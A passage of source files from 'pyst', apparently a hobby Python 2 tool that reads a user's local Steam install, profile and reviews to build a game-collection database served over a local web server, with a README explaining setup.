platform.system().lower()\n\tplatarch = \"32\"\n\tif 'PROGRAMFILES(X86)' in os.environ:\n\t\tplatarch = \"64\"\n\tsteamhome = {\"platform\": plat, \"platarch\": platarch}\n\tif plat == \"windows\":\n\t\timport _winreg\n\t\tregkey = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER,\"Software\\\\Valve\\\\Steam\")\n\t\ttry:\n\t\t\ti = 0\n\t\t\twhile 1:\n\t\t\t\tname, value, type = _winreg.EnumValue(regkey, i)\n\t\t\t\tif name == \"SteamPath\":\n\t\t\t\t\tsteamhome[\"path\"] = value\n\t\t\t\t\tbreak;\n\t\t\t\ti += 1\n\t\texcept WindowsError:\n\t\t\tprint\n\telif plat == \"linux\":\n\t\tsteamhome[\"path\"] = os.path.join(os.path.expanduser('~'),\".local\",\"share\",\"Steam\")\n\treturn steamhome" }, { "alpha_fraction": 0.6579275727272034, "alphanum_fraction": 0.6604244709014893, "avg_line_length": 19.049999237060547, "blob_id": "2c1b26d28ef7e651ea7dfa77d12900189a33c88c", "content_id": "cc08d611b0baa86266e4660a30beda57bd1b497d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 801, "license_type": "no_license", "max_line_length": 52, "num_lines": 40, "path": "/data/optionsdb.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import json\nimport os\nimport time\n\nclass OptionsDB():\n\toptions = {}\n\tsavefile = os.path.join(os.getcwd(),'options.json')\n\tdef 
__init__(self):\n\t\ttry:\n\t\t\toptionsdbfile = open(self.savefile, 'rb')\n\t\t\tself.options = json.load(optionsdbfile)\n\t\t\tself.save()\n\t\texcept:\n\t\t\tpass\n\n\tdef get(self,opt=None):\n\t\tif opt is None:\n\t\t\treturn self.options\n\t\telif opt in self.options:\n\t\t\treturn self.options[opt]\n\t\telse:\n\t\t\treturn None\n\n\tdef set(self,opt,val):\n\t\tif opt is not None and val is not None:\n\t\t\tself.options[opt] = val\n\t\t\tself.save()\n\n\tdef checkdue(self,name, delay):\n\t\tnow = time.time()\n\t\tif now - (self.get(name) or 0) > delay:\n\t\t\tself.set(name, now)\n\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\tdef save(self):\n\t\toutfile = open(self.savefile, 'wb')\n\t\tjson.dump(self.options, outfile, indent=4)\n\t\toutfile.close()" }, { "alpha_fraction": 0.6119673848152161, "alphanum_fraction": 0.6273798942565918, "avg_line_length": 39.88888931274414, "blob_id": "cf567b0b6dbeafad6219b870c38c5b6d408cecea", "content_id": "aa336a33151ceecec2ae4842e00664cfc22e637b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1103, "license_type": "no_license", "max_line_length": 148, "num_lines": 27, "path": "/loader/reviews.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import re\nimport urllib2\nfrom utils.BeautifulSoup import BeautifulSoup as bs\nimport utils\n\ndef getreviews(logindata, gamedata,page=1):\n\tif page == 1:\n\t\tfor game in gamedata:\n\t\t\tif \"review\" in gamedata[game]:\n\t\t\t\tdel gamedata[game][\"reviewed\"]\n\ttry:\n\t\tappinfofile = urllib2.urlopen(utils.getprofileurl(logindata) + \"/recommended/?p=\" + str(page))\n\t\tdoc = bs(appinfofile)\n\t\tfor el in doc.findAll(\"div\", {\"class\": \"review_box\"}):\n\t\t\t# header = el.find(\"div\", {\"class\": \"header\"})\n\t\t\t# try:\n\t\t\t# \tprint re.search(r'([0-9]+) of ([0-9]+) people \\(([0-9]+)%',header.text).groups()\n\t\t\t# except:\n\t\t\tappid = re.search(r'\\d+',el.find(\"div\",{\"class\":\"leftcol\"}).find(\"a\")[\"href\"]).group()\n\t\t\treview = re.search(r'(?<=thumbs).*(?=\\.)',el.find(\"div\",{\"class\":\"rightcol\"}).find(\"div\",{\"class\":\"thumb\"}).find(\"a\").find(\"img\")[\"src\"]).group()\n\t\t\tgamedata[appid][\"reviewed\"] = review.lower()\n\t\tpaging = doc.find(\"div\", {\"class\": \"workshopBrowsePagingInfo\"})\n\t\trevpos = re.search(r'([0-9]+) of ([0-9]+)',paging.text)\n\t\tif revpos.groups()[0] != revpos.groups()[1]:\n\t\t\tgetreviews(logindata, gamedata, page+1)\n\texcept:\n\t\tpass" }, { "alpha_fraction": 0.675159215927124, "alphanum_fraction": 0.6772823929786682, "avg_line_length": 25.22222137451172, "blob_id": "cc5873e74cfd97f7fcb09ada97acb925085a5c5e", "content_id": "871b696163fbaf5ba0c9900c19872708d74a7dd2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 471, "license_type": "no_license", "max_line_length": 51, "num_lines": 18, "path": "/data/gamedb.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import json\nimport os\nclass GameDB():\n\tgamedb = {}\n\tsavefile = os.path.join(os.getcwd(),'gamedb.json')\n\tdef load(self,logindata):\n\t\ttry:\n\t\t\tgamedbfile = open(self.savefile, 'rb')\n\t\t\tself.gamedb = json.load(gamedbfile)\n\t\texcept:\n\t\t\tpass\n\t\tif logindata[\"dir\"] not in self.gamedb:\n\t\t\tself.gamedb[logindata[\"dir\"]] = {}\n\t\treturn self.gamedb[logindata[\"dir\"]]\n\tdef save(self):\n\t\toutfile = open(self.savefile, 'wb')\n\t\tjson.dump(self.gamedb, outfile, 
indent=4)\n\t\toutfile.close()" }, { "alpha_fraction": 0.7607437968254089, "alphanum_fraction": 0.7665289044380188, "avg_line_length": 56.619049072265625, "blob_id": "5422b0ff3727dfb7138b0addc9ac139268eba82b", "content_id": "b4011f7e4877b9e3aa284e24dd637f89357f78a6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2420, "license_type": "no_license", "max_line_length": 308, "num_lines": 42, "path": "/README.md", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "# pyst\npyst is a desktop app (written in Python) which offers users of Valve's Steam gaming client access to detailed data about the games they own.\n\n\n## In detail?\n\npyst extracts data from a variety of sources (local Steam Install, public profile, Steam Reviews and Steam Store) and consolidates it into a single database.\n\nAt present it makes that database available as a JSON data-feed and as a (rough and ready) CSV file.\n\nIt also ships with some example HTML applications which use the JSON data-feed - but my hope is people will create their own applications - and even integrate other applications like RainMeter or whatever else they like!\n\n## What does pyst stand-for?\nMy earlier attempts at creating a tool like this (using Node/Javascript) were called 'SteamTray' (because they lived in a desktop tray icon and offered a Tray Menu)\n\nI converted my code to Python to reduce memory/cpu usage, gain speed and sPYthon Steam Tray became pyst!!\n\n\n## How to Use pyst\n\nOn Linux (and OSX if someone would like to help me test it!) you simply download the source-code and run `python pyst.py`\n \nOn Windows things are more complex because Python is not usually available. \nFirst-up you'll need to install Python 2 (NOT 3) from https://www.python.org/downloads/release/python-2710/ \nOur source-code includes a file (pyst.bat) which will run pyst once that's installed\nNote: pyst.bat assumes that Python is installed as default (c:\\python27) so if you install it elsewhere, edit pyst.bat to reflect that!!\n\n\n## How to setup pyst or access the JSON data-feed, CSV file and examples\n\nOnce pyst is running, you can access the pyst built-in webserver at http://localhost:55555 That page shows which user it's read the game collection for (the last one logged-into Steam) as well as some info. 
about that user's game collection, links for the JSON and CSV and a few example HTML applications.\n\n\n## Why isn't there a simple app to download - why is it source-code??\n\nIt's early days for pyst - I can (and probably will) create a standalone application you can download, but for testing/debugging it's easier (and more secure) using source-code at this point.\n\nIf nothing else, more people can see all my mistakes and help me add stuff and make the whole thing more 'Pythonic' perhaps ;0\n\n\n## I have a problem\nThere's the bare-bones of a Wiki [starting here](../../wiki) - or head-over to the issues button to the right!!\n" }, { "alpha_fraction": 0.6856745481491089, "alphanum_fraction": 0.6968011260032654, "avg_line_length": 27.799999237060547, "blob_id": "b319184584827021add7568a99f76e179c81ccc9", "content_id": "f5d42e973aa96cdf59f8eda7a37601825956f9df", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 719, "license_type": "no_license", "max_line_length": 82, "num_lines": 25, "path": "/loader/onlineprofile.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import urllib2\nimport xml.etree.ElementTree as ET\nimport utils\n\ndef getprofile(logindata,gamedata):\n\tdef getval(xmlval, default):\n\t\tif xmlval is not None:\n\t\t\treturn xmlval.text\n\t\telse:\n\t\t\treturn default\n\tusock = urllib2.urlopen(utils.getprofileurl(logindata) + \"/games/?tab=all&xml=1\")\n\ttry:\n\t\txmldoc = ET.parse(usock)\n\t\troot = xmldoc.getroot()\n\t\tfor game in root.find(\"games\").findall(\"game\"):\n\t\t\tappid = game.find(\"appID\").text\n\t\t\tif appid in gamedata:\n\t\t\t\thrs = getval(game.find(\"hoursOnRecord\"), None)\n\t\t\t\tif hrs is not None:\n\t\t\t\t\tgamedata[appid][\"timeplayed\"] = hrs\n\t\t\t\thrs2wks = getval(game.find(\"hoursLast2Weeks\"), None)\n\t\t\t\tif hrs2wks is not None:\n\t\t\t\t\tgamedata[appid][\"timeplayed2wk\"] = hrs2wks\n\texcept:\n\t\tpass" }, { "alpha_fraction": 0.6271212100982666, "alphanum_fraction": 0.6409090757369995, "avg_line_length": 36.08427047729492, "blob_id": "b937c83d5d891c3e1969a036e5ad49eee335c54c", "content_id": "2ef32b27732c6d61a8db87dcab41cc29532bcdf5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6600, "license_type": "no_license", "max_line_length": 167, "num_lines": 178, "path": "/loader/apppackages.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport time\nimport utils\n\ndef getappinfo(steamhome, logindata):\n\n\tlibrarydirs = {}\n\tlibrarydirs[steamhome[\"path\"]] = True\n\ttry:\n\t\tfor steamapp in utils.steamapps:\n\t\t\tlibraryvdf = utils.vdf.load(open(os.path.join(steamhome[\"path\"],steamapp,\"libraryfolders.vdf\")))\n\t\t\tif libraryvdf is not None and \"LibraryFolders\" in libraryvdf:\n\t\t\t\tfor folder in libraryvdf[\"LibraryFolders\"]:\n\t\t\t\t\tlibrarydirs[libraryvdf[\"LibraryFolders\"][\"1\"]] = True\n\texcept:\n\t\tpass\n\n\tdef checkinstalled(direxe):\n\t\tfor lib in librarydirs:\n\t\t\tfor steamapp in utils.steamapps:\n\t\t\t\texe = os.path.join(lib,steamapp,\"common\",direxe)\n\t\t\t\tif os.path.exists(exe):\n\t\t\t\t\treturn True\n\t\t\treturn None\n\n\tappinfo = {}\n\ttry:\n\t\tappinfofile = open(os.path.join(steamhome[\"path\"],'appcache','appinfo.vdf'), 'rb')\n\t\tappinfodata = appinfofile.read().decode(\"ISO-8859-1\")\n\t\tappinfofile.close()\n\n\t\tgames = re.compile(\"\\x02\\x00common\").split(appinfodata)\n\t\tappmatch = 
re.compile(\"\\x02gameid\\x00([\\s\\S]{3})\")\n\t\tfsplit = re.compile(\"\\x00[\\x01\\x02]\")\n\t\tesplit = re.compile(\"(?=\\x00\\x01executable(?=\\x00))\")\n\n\t\tfor game in games:\n\t\t\tgameid = appmatch.search(game)\n\t\t\tif gameid and gameid.group(1):\n\t\t\t\tappid = utils.getnum(gameid.group(1))\n\t\t\t\tfielddict = {}\n\t\t\t\tfields = game.split(chr(1))\n\t\t\t\tfor field in fields:\n\t\t\t\t\tvals = field.split(chr(0))\n\t\t\t\t\tif vals is not None and vals[0] is not None and vals[0] not in fielddict:\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tfielddict[vals[0]] = vals[1]\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\tpass # probably an invalid key - ignore it\n\t\t\t\tappinfo[appid] = {\n\t\t\t\t\t\"name\": fielddict[\"name\"].encode(\"ISO-8859-1\"),\n\t\t\t\t \"type\": \"\"\n\t\t\t\t}\n\t\t\t\tif \"installdir\" in fielddict:\n\t\t\t\t\tappinfo[appid][\"path\"] = fielddict[\"installdir\"]\n\t\t\t\tif \"dlcappid\" in fielddict:\n\t\t\t\t\tappinfo[appid][\"isdlc\"] = True\n\t\t\t\tif \"type\" in fielddict:\n\t\t\t\t\tappinfo[appid][\"type\"] = fielddict[\"type\"]\n\t\t\t\t\tif fielddict[\"type\"].upper() == \"DLC\":\n\t\t\t\t\t\tappinfo[appid][\"isdlc\"] = True\n\t\t\t\tif \"logo\" in fielddict:\n\t\t\t\t\tappinfo[appid][\"logo\"] = \"http://cdn.akamai.steamstatic.com/steamcommunity/public/images/apps/\" + str(appid) + \"/\" + fielddict[\"logo\"] + \".jpg\"\n\t\t\t\tif \"installdir\" in fielddict:\n\t\t\t\t\texes = utils.zerowidthsplit(esplit, game)\n\t\t\t\t\texes.pop(0) # discard the leading bit\n\t\t\t\t\tfor e in exes:\n\t\t\t\t\t\texedata={}\n\t\t\t\t\t\texefields = fsplit.split(e)\n\t\t\t\t\t\tfor ef in exefields:\n\t\t\t\t\t\t\texevals = ef.split(chr(0))\n\t\t\t\t\t\t\tif exevals[0] is not None and exevals[0] not in exedata:\n\t\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\t\texedata[exevals[0]] = exevals[1]\n\t\t\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\t\t\tpass # probably an invalid key - ignore it\n\t\t\t\t\t\tif (\"oslist\" not in exedata or exedata[\"oslist\"] == steamhome[\"platform\"]) and (\"osarch\" not in exedata or exedata[\"osarch\"] == steamhome[\"platarch\"]):\n\t\t\t\t\t\t\tif os.path.isabs(exedata[\"executable\"]):\n\t\t\t\t\t\t\t\texedata[\"executable\"] = exedata[\"executable\"][1:]\n\t\t\t\t\t\t\tappinfo[appid][\"exe\"] = exedata[\"executable\"]\n\t\t\t\t\t\t\tif \"installdir\" in fielddict and \"executable\" in exedata:\n\t\t\t\t\t\t\t\tappinfo[appid][\"foundat\"] = os.path.join(fielddict[\"installdir\"],exedata[\"executable\"])\n\t\t\t\t\t\t\tif \"CheckGuid\" in fielddict:\n\t\t\t\t\t\t\t\tappinfo[appid][\"guid\"] = fielddict[\"CheckGuid\"]\n\t\t\t\t\t\t\tif \"checkguids\" in fielddict:\n\t\t\t\t\t\t\t\tappinfo[appid][\"guids\"] = fielddict[\"checkguids\"]\n\t\t\t\t\t\t\tbreak\n\texcept:\n\t\tpass\n\n\tpackageinfo = {}\n\ttry:\n\t\tpackageinfofile = open(os.path.join(steamhome[\"path\"],'appcache','packageinfo.vdf'), 'rb')\n\t\tpackageinfodata = packageinfofile.read().decode(\"ISO-8859-1\")\n\t\tpackageinfofile.close()\n\n\t\tpmatch = re.compile(\"PackageID\\x00([\\s\\S]{4})\\x02\")\n\t\tematch = re.compile(\"\\x02ExpiryTime\\x00([\\s\\S]{4})\")\n\t\tamatch = re.compile(\"\\x02.*?\\x00([\\s\\S]{3})\\x00\")\n\t\tpackages = utils.zerowidthsplit(re.compile(\"(?=\\x00appids)\"),packageinfodata)\n\n\t\tfor package in packages:\n\t\t\tpkgmatch = pmatch.search(package)\n\t\t\tif pkgmatch is not None:\n\t\t\t\tpkgid = utils.getnum(pkgmatch.group(1))\n\t\t\t\tpackageinfo[pkgid] = {\"name\": \"unknown\", \"appids\": {}}\n\t\t\t\ttry :\n\t\t\t\t\texpmatch = ematch.search(package)\n\t\t\t\t\tif 
expmatch is not None:\n\t\t\t\t\t\texptime = int(utils.getnum(expmatch.group(1)))\n\t\t\t\t\t\tif exptime is not None and exptime < time.time():\n\t\t\t\t\t\t\tpackageinfo[pkgid][\"expired\"] = True\n\t\t\t\texcept (RuntimeError, TypeError, NameError):\n\t\t\t\t\tpass\n\t\t\t\tappidkey = package[8:]\n\t\t\t\twhile appidkey[0:1] == chr(2):\n\t\t\t\t\tappmatch = amatch.match(appidkey)\n\t\t\t\t\tif appmatch is not None:\n\t\t\t\t\t\tappid = utils.getnum(appmatch.group(1))\n\t\t\t\t\t\tpackageinfo[pkgid][\"appids\"][appid] = True\n\t\t\t\t\t\tappidkey = appidkey[len(appmatch.group(0)):]\n\texcept:\n\t\tpass\n\n\tgamedb = {}\n\tfor package in logindata[\"configdata\"][\"UserLocalConfigStore\"][\"Licenses\"]:\n\t\tif package in packageinfo and \"expired\" not in packageinfo[package] and \"appids\" in packageinfo[package]:\n\t\t\tfor appid in packageinfo[package][\"appids\"]:\n\t\t\t\tif appid in appinfo:\n\t\t\t\t\tif appid not in gamedb:\n\t\t\t\t\t\tgamedb[appid] = {\n\t\t\t\t\t\t\t\"name\": appinfo[appid][\"name\"]\n\t\t\t\t\t\t}\n\t\t\t\t\tif \"logo\" in appinfo[appid]:\n\t\t\t\t\t\tgamedb[appid][\"gridimage\"] = appinfo[appid][\"logo\"]\n\t\t\t\t\tif \"packageid\" not in gamedb[appid] or int(gamedb[appid][\"packageid\"]) < int(package):\n\t\t\t\t\t\tgamedb[appid][\"data-packageid\"] = package\n\n\tgamelist = {}\n\tconf = {}\n\tif \"apps\" in logindata[\"configdata\"][\"UserLocalConfigStore\"][\"Software\"][\"Valve\"][\"Steam\"]:\n\t\tconf = logindata[\"configdata\"][\"UserLocalConfigStore\"][\"Software\"][\"Valve\"][\"Steam\"][\"apps\"]\n\tfor game in gamedb:\n\t\tif \"type\" in appinfo[game]:\n\t\t\tgametype = appinfo[game][\"type\"]\n\t\tif (\"data-packageid\" not in gamedb[game] or int(gamedb[game][\"data-packageid\"]) > 0) and (gametype == \"\" or gametype.upper() == \"GAME\" or gametype.upper() == \"DLC\"):\n\t\t\tconfdata = {\"LastPlayed\": 0}\n\t\t\tif game in conf:\n\t\t\t\tconfdata = utils.merge(confdata,conf[game])\n\t\t\ttags = \"\"\n\t\t\tif \"tags\" in confdata:\n\t\t\t\tfor tag in confdata[\"tags\"]:\n\t\t\t\t\ttags += \"::\" + confdata[\"tags\"][tag]\n\t\t\tif \"hidden\" in confdata:\n\t\t\t\ttags += \"::hidden\"\n\t\t\tdataattrs = {\n\t\t\t \"data-categories\": tags\n\t\t\t}\n\t\t\tif \"LastPlayed\" in confdata and int(confdata[\"LastPlayed\"]) >= 1200000000:\n\t\t\t\tdataattrs[\"data-lastplayed\"] = confdata[\"LastPlayed\"]\n\t\t\tif game in appinfo:\n\t\t\t\tif \"foundat\" in appinfo[game] and appinfo[game][\"foundat\"] is not None and checkinstalled(appinfo[game][\"foundat\"]):\n\t\t\t\t\tdataattrs[\"data-exe\"] = appinfo[game][\"exe\"]\n\t\t\t\t\tdataguids = \"\"\n\t\t\t\t\tif \"guid\" in appinfo[game]:\n\t\t\t\t\t\tdataguids = appinfo[game][\"guid\"]\n\t\t\t\t\tif \"guids\" in appinfo[game]:\n\t\t\t\t\t\tif dataguids:\n\t\t\t\t\t\t\tdataguids += \";\"\n\t\t\t\t\t\tdataguids += appinfo[game][\"guids\"]\n\t\t\t\t\tif dataguids != \"\":\n\t\t\t\t\t\tdataattrs[\"data-guids\"] = dataguids\n\t\t\t\tif \"isdlc\" in appinfo[game]:\n\t\t\t\t\tdataattrs[\"data-isdlc\"] = True\n\t\t\tgamelist[game] = utils.merge(gamedb[game],dataattrs)\n\n\treturn gamelist" }, { "alpha_fraction": 0.6438162326812744, "alphanum_fraction": 0.6579505205154419, "avg_line_length": 29.7608699798584, "blob_id": "0f1d60dc1a0e03f8ec4d113f1a26133422c37522", "content_id": "3a9d456918dd65ad9c86355d056a85b6c35df5f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1415, "license_type": "no_license", "max_line_length": 73, "num_lines": 46, "path": 
"/gamemon/__init__.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\nimport time\nimport platform\nimport subprocess\n\ndef checkprocs(gamedata,localdata):\n\tdef getprocesses():\n\t\tif platform.system().lower() == \"windows\":\n\t\t\treturn \"tasklist /nh\"\n\t\telif platform.system().lower() == \"linux\":\n\t\t\treturn [\"ps\",\"-eo\",\"command\"]\n\t\telse:\n\t\t\treturn False\n\n\tcmd = getprocesses()\n\tif cmd != False:\n\t\toutp = subprocess.check_output(cmd).lower()\n\telse:\n\t\treturn\n\n\tnow = time.time()\n\tfor game in localdata:\n\t\tlastseen = 0\n\t\tif \"lastseenrunning\" in gamedata[game]:\n\t\t\tlastseen = gamedata[game][\"lastseenrunning\"]\n\t\t\tdel gamedata[game][\"lastseenrunning\"]\n\t\texes = \"\"\n\t\tif \"data-exe\" in localdata[game]:\n\t\t\texes += localdata[game][\"data-exe\"] + \";\"\n\t\tif \"data-guids\" in localdata[game]:\n\t\t\texes += localdata[game][\"data-guids\"]\n\t\tfor exe in exes.split(\";\"):\n\t\t\tif exe and os.path.basename(exe).lower() in outp:\n\t\t\t\tif lastseen > 0:\n\t\t\t\t\truntime = 0\n\t\t\t\t\truntime2wk = 0\n\t\t\t\t\tif \"timeplayed\" in gamedata[game]:\n\t\t\t\t\t\truntime = float(gamedata[game][\"timeplayed\"])\n\t\t\t\t\tif \"timeplayed2wk\" in gamedata[game]:\n\t\t\t\t\t\truntime2wk = float(gamedata[game][\"timeplayed2wk\"])\n\t\t\t\t\ttimerun = min(.017,(now - lastseen)/60/60) # max of 1 min approx\n\t\t\t\t\tgamedata[game][\"timeplayed\"] = str(round(runtime + timerun,3))\n\t\t\t\t\tgamedata[game][\"timeplayed2wk\"] = str(round(runtime2wk + timerun,3))\n\t\t\t\t\tif game in localdata:\n\t\t\t\t\t\tlocaldata[game][\"data-lastplayed\"] = now\n\t\t\t\tgamedata[game][\"lastseenrunning\"] = now\n" }, { "alpha_fraction": 0.6490280628204346, "alphanum_fraction": 0.676025927066803, "avg_line_length": 31.508771896362305, "blob_id": "d0d8b3de991f149b03708c7dc4f708fcc194a81b", "content_id": "34548a85bdb7342b2b4e6e21ff95063edef0618d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1852, "license_type": "no_license", "max_line_length": 115, "num_lines": 57, "path": "/loader/shortcuts.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import os\nimport re\nimport zlib\nimport hashlib\nimport utils\n\ndef getshortcuts(steamhome,logindata):\n\tdef makescid(exe,appname):\n\t\tcrc = zlib.crc32(exe+appname)\n\t\tcrc = (crc | 0x80000000) & 0xffffffff\n\t\tcrch = ('%x' % crc) + \"02000000\"\n\t\treturn str(int(crch,base=16)) # back to decimal but as string not int\n\n\tgridimages = {}\n\tfor root, dirs, gridfiles in os.walk(os.path.join(steamhome[\"path\"],\"userdata\",logindata[\"dir\"],\"config\",\"grid\")):\n\t\tfor gridfile in gridfiles:\n\t\t\tscappid = os.path.splitext(gridfile)[0]\n\t\t\tgridimages[scappid] = os.path.join(root,gridfile)\n\n\tssplit = re.compile(\"\\x00\\x01appname[^\\x08]*\\x08\\x08\")\n\tksplit = re.compile(\"\\x00[\\x01\\x02]\\x00*\")\n\n\tshortcutdb = {}\n\ttry:\n\t\tshortcutfile = open(os.path.join(steamhome[\"path\"],\"userdata\",logindata[\"dir\"],\"config\",\"shortcuts.vdf\"))\n\t\tshortcutdata = shortcutfile.read().decode(\"UTF-8\")\n\t\tshortcuts = ssplit.findall(shortcutdata)\n\t\tshortcutvdf = {}\n\t\tfor shortcut in shortcuts:\n\t\t\tkvs = ksplit.split(shortcut)\n\t\t\tkeyvals = {}\n\t\t\tfor kv in kvs:\n\t\t\t\tkeyval = kv.split(chr(0))\n\t\t\t\tif (len(keyval) > 1):\n\t\t\t\t\tkeyvals[keyval[0]] = keyval[1]\n\t\t\tshortcutvdf[keyvals[\"appname\"]] = keyvals\n\t\t\t# Tags are NOT saved 
properly for shortcuts - so don't expect them to appear\n\n\t\tscdb = logindata[\"configdata\"][\"UserLocalConfigStore\"][\"shortcuts\"]\n\t\tfor sc in shortcutvdf:\n\t\t\tscut = shortcutvdf[sc]\n\t\t\tscappid = makescid(scut[\"exe\"],scut[\"appname\"])\n\t\t\tdataattrs = {\n\t\t\t \"name\": scut[\"appname\"],\n\t\t\t \"data-shortcut\": True\n\t\t\t}\n\t\t\tif \"exe\" in scut:\n\t\t\t\tdataattrs[\"data-exe\"] = utils.stripquotes(scut[\"exe\"])\n\t\t\t\tsha1 = hashlib.sha1(scut[\"exe\"])\n\t\t\t\tif sha1.hexdigest() in scdb:\n\t\t\t\t\tdataattrs[\"data-lastplayed\"] = scdb[sha1.hexdigest()][\"LastPlayed\"]\n\t\t\tif scappid in gridimages:\n\t\t\t\tdataattrs[\"gridimage\"] = gridimages[scappid]\n\t\t\tshortcutdb[scappid] = dataattrs\n\texcept:\n\t\tpass\n\treturn shortcutdb" }, { "alpha_fraction": 0.6952515840530396, "alphanum_fraction": 0.7037562131881714, "avg_line_length": 34.29999923706055, "blob_id": "e746abf7bbbc140c63629dcf8f5c0d2b4d081ea7", "content_id": "0e7805f3fc4bfaf53db542f68cf588e9f37202f9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1411, "license_type": "no_license", "max_line_length": 77, "num_lines": 40, "path": "/server/__init__.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "import SimpleHTTPServer\nimport SocketServer\nimport urlparse\nimport os\nimport utils\n\ndef runserver(serverhandler, serverstop):\n\tclass ServerHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\n\t\tdef do_GET(self):\n\t\t\tglobal serverstop\n\t\t\turl = urlparse.urlparse(self.path)\n\t\t\tqs = dict(urlparse.parse_qsl(url.query))\n\t\t\tfor path in serverhandler:\n\t\t\t\tif url.path.endswith(path):\n\t\t\t\t\tcontent,retval = serverhandler[path](qs)\n\t\t\t\t\tself.send_response(200)\n\t\t\t\t\tself.send_header('Content-Type', content)\n\t\t\t\t\tif content == \"text/csv\":\n\t\t\t\t\t\tself.send_header(\"Content-Disposition\",\"attachment;filename=games.csv\")\n\t\t\t\t\tself.end_headers()\n\t\t\t\t\tif \"callback\" in qs:\n\t\t\t\t\t\tretval = qs[\"callback\"] + \"(\" + retval + \")\"\n\t\t\t\t\tself.wfile.write(retval)\n\t\t\t\t\treturn\n\t\t\tSimpleHTTPServer.SimpleHTTPRequestHandler.do_GET(self)\n\t\t# def do_POST(self):\n\t\t\t# leng = int(self.headers.getheader('content-length'))\n\t\t\t# postvars = urlparse.parse_qs(self.rfile.read(leng), keep_blank_values=1)\n\t\t\t# self.send_response(200)\n\t\t\t# self.send_header('Content-Type', 'application/json')\n\t\t\t# self.end_headers()\n\t\t\t# self.wfile.write(json.dumps(gamedb))\n\t\tdef log_message(self, format, *args):\n\t\t\tutils.debuglog(\"%s - %s\\n\" % (self.log_date_time_string(),format%args))\n\n\tos.chdir(\"web\")\n\tSocketServer.TCPServer.allow_reuse_address = True\n\thttpd = SocketServer.TCPServer((\"\", 55555), ServerHandler)\n\twhile not serverstop:\n\t\thttpd.handle_request()" }, { "alpha_fraction": 0.7014061212539673, "alphanum_fraction": 0.7063689231872559, "avg_line_length": 32.58333206176758, "blob_id": "22d5bd6627307a8681dd7a7a3e98aa3a3d2aca92", "content_id": "d18a94d26cb089a4cbb5417513bea8c8c655ea26", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1209, "license_type": "no_license", "max_line_length": 101, "num_lines": 36, "path": "/loader/locals.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "from loader import shortcuts, apppackages, purchased\nimport time\nimport os\nimport utils\n\ndef getlocals(steamhome, logindata, gamedata, 
localdata):\n\tlogindata[\"configdata\"] = {}\n\tfor root, subFolders, files in os.walk(os.path.join(steamhome[\"path\"],\"userdata\",logindata[\"dir\"])):\n\t\tfor file in files:\n\t\t\tif file.lower().endswith(\"config.vdf\"):\n\t\t\t\tvdfdata = utils.vdf.load(open(os.path.join(steamhome[\"path\"],\"userdata\",root,file)))\n\t\t\t\tlogindata[\"configdata\"] = utils.merge(logindata[\"configdata\"],vdfdata)\n\n\tdef getnewgamedata(appid, name):\n\t\tret = {\n\t\t\"appid\": appid,\n\t\t\"name\": name\n\t\t}\n\t\tif int(appid) <= 999999: # not a shortcut\n\t\t\tret[\"firstseen\"] = int(time.time())\n\t\treturn ret\n\n\tpurchaseddata = purchased.getpurchased(logindata)\n\n\tlocaldb = utils.merge(\n\t\tshortcuts.getshortcuts(steamhome, logindata),\n\t\tapppackages.getappinfo(steamhome, logindata)\n\t)\n\tlocaldata.clear()\n\tfor g in localdb:\n\t\tif \"data-isdlc\" not in localdb[g]:\n\t\t\tlocaldata[g] = localdb[g]\n\t\t\tif not g in gamedata:\n\t\t\t\tgamedata[g] = getnewgamedata(g, localdb[g][\"name\"])\n\t\t\tif \"data-packageid\" in localdb[g] and localdb[g][\"data-packageid\"] in purchaseddata:\n\t\t\t\tgamedata[g][\"firstseen\"] = purchaseddata[localdb[g][\"data-packageid\"]]\n" }, { "alpha_fraction": 0.722663164138794, "alphanum_fraction": 0.7297177910804749, "avg_line_length": 24.211111068725586, "blob_id": "214880d95e3d4f9a857efff2092c697b4c05eca4", "content_id": "4e4072d61cb71d1f5422a7f8cba1cdeb513752d0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2268, "license_type": "no_license", "max_line_length": 107, "num_lines": 90, "path": "/pyst.py", "repo_name": "shrewdlogarithm/pyst", "src_encoding": "UTF-8", "text": "from loader import steamhome, finduser, locals, onlineprofile, api, reviews\nfrom data import gamedb,optionsdb\nimport gamemon\nimport server\nimport json\nimport copy\nimport utils\n\nsteamhome = steamhome.getpath()\n\nlogindata = finduser.getuserconfig(steamhome)\n\ndbs = []\n\noptions = optionsdb.OptionsDB()\n\ngamedb = gamedb.GameDB()\ngamedata = gamedb.load(logindata)\ndbs.append(gamedata)\n\nlocaldata = {}\ndbs.append(localdata)\n\napidata = 